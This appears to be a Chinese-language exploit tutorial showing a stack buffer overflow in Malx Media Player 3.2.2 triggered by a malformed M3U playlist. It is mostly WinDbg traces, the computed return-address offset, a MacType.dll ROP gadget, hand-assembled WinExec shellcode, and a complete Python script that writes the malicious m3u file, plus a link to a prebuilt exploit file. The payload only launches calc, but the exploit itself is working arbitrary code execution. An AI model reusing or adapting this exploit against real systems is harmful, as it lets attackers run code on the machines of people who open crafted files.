Malx Media Player 3.2.2 处理畸形m3u文件时会发生栈溢出,从而可以让攻击者成功控制EIP,执行任意代码。(Win7 SP1配合MacType进行ROP)
Malx Media Player使用MAX_PATH作为参数初始化栈上变量,但是使用vfscanf时并没有考虑输入长度,导致栈溢出。 软件地址:http://malx-media-player.software.informer.com/ 构建一个畸形M3U文件,然后载入程序,喜闻乐见的崩溃,kvn回溯栈调用发现它是从vfscanf进去的,看来一定是用了MAX_PATH了,再试一下它是从哪块函数调用上vfscanf的:
0:000> bp msvcrt!vfscanf 0:000> bl 0 e 76cf574d 0001 (0001) 0:**** msvcrt!vfscanf 1 eu 0001 (0001) (msvcrf!fscanf) 0:000> g Breakpoint 0 hit eax=0018f92c ebx=0018fb64 ecx=76c9a6db edx=0008e381 esi=76d22960 edi=76cf58b9 eip=76cf574d esp=0018f904 ebp=0018f91c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 msvcrt!vfscanf: 76cf574d 6a0c push 0Ch
gu两次,看到是从image00400000+0x46f0这儿进去的:
0:000> gu eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9 eip=76cf58d4 esp=0018f908 ebp=0018f91c iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 msvcrt!fscanf+0x1b: 76cf58d4 83c414 add esp,14h 0:000> gu *** WARNING: Unable to verify checksum for image00400000 *** ERROR: Module load completed but symbols could not be loaded for image00400000 eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9 eip=004046f0 esp=0018f924 ebp=00000001 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 image00400000+0x46f0: 004046f0 83c40c add esp,0Ch
没代码没符号光看十分蛋疼,简单的判断一下出问题的区域,此时再gu一次
0:000> gu (2304.288): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=01d5004c eip=41414141 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 41414141 ?? ???
eip跳到了41414141,看来是覆盖了retn的地址。 重来,从之前的image00400000+0x46f0往后一直p,然后到retn为止发现都没事儿,那估计就是这个retn导致的:
Breakpoint 0 hit eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c eip=00404744 esp=0018f93c ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 image00400000+0x4744: 00404744 81c408020000 add esp,208h 0:000> dd esp 0018f93c 0055334d 00000003 0088d550 00000016 0018f94c 00000000 01000003 00000000 00000016 0018f95c 00005765 0018f898 77aa57d0 0018f9d0 0018f96c 0018f99c 77ac0806 00870000 00000000 0018f97c 00870000 0088d108 77a1b8ea 0088d108 0018f98c 00870000 00870000 77a1b8ea 0088d108 0018f99c 0018f9e0 77ac17b0 00870138 77ac1794 0018f9ac 66f6ed3b 00870000 00870000 00000000 0:000> p eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 image00400000+0x474a: 0040474a c3 ret
查看对应栈:
0:000> dd esp 0018fb44 41414141 41414141 41414141 41414141 0018fb54 41414141 41414141 41414141 41414141 0018fb64 41414141 41414141 41414141 41414141 0018fb74 41414141 41414141 41414141 41414141 0018fb84 43414141 43434343 43434343 43434343 0018fb94 43434343 43434343 43434343 43434343 0018fba4 43434343 43434343 43434343 43434343 0018fbb4 53434343 53535353 53535353 53535353
真是一个悲伤的故事啊…… 由于倒数第二个是add esp,208h;那我们就倒回去看看:
0:000> dd esp-208 esp 0018f93c 0055334d 00000003 0088d550 00000016 0018f94c 00000000 01000003 00000000 00000016 0018f95c 00005765 0018f898 77aa57d0 0018f9d0 0018f96c 0018f99c 77ac0806 00870000 00000000 0018f97c 00870000 0088d108 77a1b8ea 0088d108 0018f98c 00870000 00870000 77a1b8ea 0088d108 0018f99c 0018f9e0 77ac17b0 00870138 77ac1794 0018f9ac 66f6ed3b 00870000 00870000 00000000 0018f9bc 00870000 00000000 01010000 0018f9ac 0018f9cc 00000068 0018fac4 77a671f5 114fc46b 0018f9dc fffffffe 77ac1794 77a7ac29 00870000 0018f9ec 50000063 77a238aa 66f6ee0f 00000000 0018f9fc 00870000 0088d110 00000000 00401270 0018fa0c 00000000 00de0706 00000084 00000000 0018fa1c 00680515 00000004 000003a8 00870000 0018fa2c 00000000 00000001 00000001 00000000 0018fa3c 00000000 415c3a41 41414141 41414141 0018fa4c 41414141 41414141 41414141 41414141 0018fa5c 41414141 41414141 41414141 41414141 0018fa6c 41414141 41414141 41414141 41414141 0018fa7c 41414141 41414141 41414141 41414141 0018fa8c 41414141 41414141 41414141 41414141 0018fa9c 41414141 41414141 41414141 41414141 0018faac 41414141 41414141 41414141 41414141 0018fabc 41414141 41414141 41414141 41414141 0018facc 41414141 41414141 41414141 41414141 0018fadc 41414141 41414141 41414141 41414141 0018faec 41414141 41414141 41414141 41414141 0018fafc 41414141 41414141 41414141 41414141 0018fb0c 41414141 41414141 41414141 41414141 0018fb1c 41414141 41414141 41414141 41414141 0018fb2c 41414141 41414141 41414141 41414141 0018fb3c 41414141 41414141 41414141
果然是一个悲伤的故事呀…… 这个retn地址被覆盖的位置位于多少偏移处呢?
0:000> ?(18fa3c+4 - esp) Evaluate expression: -260 = fffffefc
260,这个熟悉的数字,真是一个灾难。 找找ROP,发现MacType!ReloadConfig+0x24cca有一个很好很符合要求的ROP
---------------------- size 1 MacType!ReloadConfig+0x24cca: 1002756a 54 push esp 1002756b c3 ret
由于是在练手,所以咱也暂时不考虑通用性,查看WinExec的地址:
0:000> x kernel32!WinExec 768a2c51 kernel32!WinExec = <no type information>
大概就勾画出了我们的SHELLCODE的原始形态: ROP 6a750210 #1002756a;MacType!ReloadConfig+0x24cca, push esp; ret; #Shellcode start $ 31C0 XOR EAX,EAX $+2 50 PUSH EAX $+3 B8 43414C43 MOV EAX,434C4143 $+8 50 PUSH EAX ;"CALC\0" $+9 89E1 MOV ECX,ESP ;保存这个字符串的指针 $+B 40 INC EAX $+C 50 PUSH EAX ;uCmdShow == 1 $+D 51 PUSH ECX ;lpCmdLine $+E E8 XXXXXXX CALL WinExec 其实还要设置一个MOV EBX, ESP; DEC EBX,80H; MOV EBP,EBX;,这样才能保证WinExec不出错……INC EAX之前要XOR EAX,EAX一下,上面的是我之前打的草稿,我也偷个懒不贴机器码啦,OD里面一放就能查到
编辑M3U文件,载入运行,
0:001> bp 40474a *** WARNING: Unable to verify checksum for E:\Program Files (x86)\Mplay\mplay.exe *** ERROR: Module load completed but symbols could not be loaded for E:\Program Files (x86)\Mplay\mplay.exe 0:001> g Breakpoint 0 hit eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 mplay+0x474a: 0040474a c3 ret 0:000> p eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=1002756a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 *** WARNING: Unable to verify checksum for E:\Program Files (x86)\MacType\MacType.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Program Files (x86)\MacType\MacType.dll - MacType!ReloadConfig+0x24cca: 1002756a 54 push esp 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=1002756b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 MacType!ReloadConfig+0x24ccb: 1002756b c3 ret 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb48 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 0018fb48 31c0 xor eax,eax 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb4a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb4a 50 push eax 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb4b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb4b b843414c43 mov eax,434C4143h 0:000> eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb50 esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb50 50 push eax 0:000> eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb51 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb51 89e1 mov ecx,esp 0:000> eax=434c4143 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb53 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb53 40 inc eax 0:000> eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb54 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 0018fb54 50 push eax 0:000> eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb55 esp=0018fb3c ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 0018fb55 51 push ecx 0:000> eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb56 esp=0018fb38 ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 0018fb56 e8fb307176 call kernel32!WinExec+0x5 (768a2c56) 0:000> dd esp 0018fb38 0018fb40 434c4144 434c4143 00000000 0018fb48 b850c031 434c4143 40e18950 fbe85150 0018fb58 00767130 00000000 00000000 555c3a45 0018fb68 73726573 616c425c 53547473 7365445c 0018fb78 706f746b 6d2e375c 75007533 008fb710 0018fb88 00000000 ffffffec 00000000 020e4758 0018fb98 020e4758 008fb710 008fb710 0018fbe4 0018fba8 754a702c 008fb710 00000000 ffffffec 0:000> da 18fb40 0018fb40 "CALC"
注:Debug模式下MacType模块是不会注入的,所以如果要测试着玩的话,还是要让它自己跑再Attach才可以 POC:
#!/usr/bin/env python print "blast off!" filepath = "poc.m3u" f = open(filepath, "wb") file = '\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x75\x02\x10\x31\xc0\x50\xb8\x43\x41\x4c\x43\x50\x89\xe1\x40\x50\x51\xe8\xfb\x30\x71\x76\x00' f.write(file) f.close() print "Done.\nOpen poc.m3u"
弄好的二进制文件:http://lno.pw/exp.m3u,由于为了省事,没有用通用的方式处理,所以WinExec地址请自行修改